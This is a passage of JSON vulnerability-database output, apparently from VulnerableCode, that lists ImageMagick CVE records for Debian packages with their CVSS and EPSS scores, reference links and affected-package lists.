"VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-12979" ], "risk_score": 3.3, "exploitability": "0.5", "weighted_severity": "6.6", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2dgn-j4dn-9fcd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82005?format=api", "vulnerability_id": "VCID-2dwv-ndt5-gfg2", "summary": "ImageMagick: division by zero at MagickCore/geometry.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27756.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27756.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27756", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33092", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33223", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33255", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33087", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.3313", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33163", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33166", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33127", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33103", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33144", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33121", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.33082", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00134", "scoring_system": "epss", "scoring_elements": "0.32936", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27756" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27756", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27756" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894233", "reference_id": "1894233", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1894233" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27756" ], "risk_score": 2.5, "exploitability": "0.5", "weighted_severity": "5.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2dwv-ndt5-gfg2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81428?format=api", "vulnerability_id": "VCID-2m38-vt4m-5ffa", "summary": "ImageMagick: Stack buffer overflow in XPM coder could result in a crash", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-19667.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-19667.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-19667", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35414", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35613", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35638", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.3552", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35566", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35591", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35601", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35556", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35533", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35573", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35562", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35512", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.0015", "scoring_system": "epss", "scoring_elements": "0.35273", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-19667" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-19667", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-19667" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1851910", "reference_id": "1851910", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1851910" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/5335-1/", "reference_id": "USN-5335-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5335-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-19667" ], "risk_score": 3.5, "exploitability": "0.5", "weighted_severity": "7.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-2m38-vt4m-5ffa" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/79206?format=api", "vulnerability_id": "VCID-3bbh-2exn-m7ac", "summary": "security update", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-19948.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.0", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-19948.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00387", "scoring_system": "epss", "scoring_elements": "0.5971", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00387", "scoring_system": "epss", "scoring_elements": "0.59784", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00387", "scoring_system": "epss", "scoring_elements": "0.59808", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00387", "scoring_system": "epss", "scoring_elements": "0.59777", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00387", "scoring_system": "epss", "scoring_elements": "0.59829", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00387", "scoring_system": "epss", "scoring_elements": "0.59842", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00387", "scoring_system": "epss", "scoring_elements": "0.59863", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00387", "scoring_system": "epss", "scoring_elements": "0.59846", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00387", "scoring_system": "epss", "scoring_elements": "0.59828", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00387", "scoring_system": "epss", "scoring_elements": "0.59866", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00387", "scoring_system": "epss", "scoring_elements": "0.59873", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00387", "scoring_system": "epss", "scoring_elements": "0.59858", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": 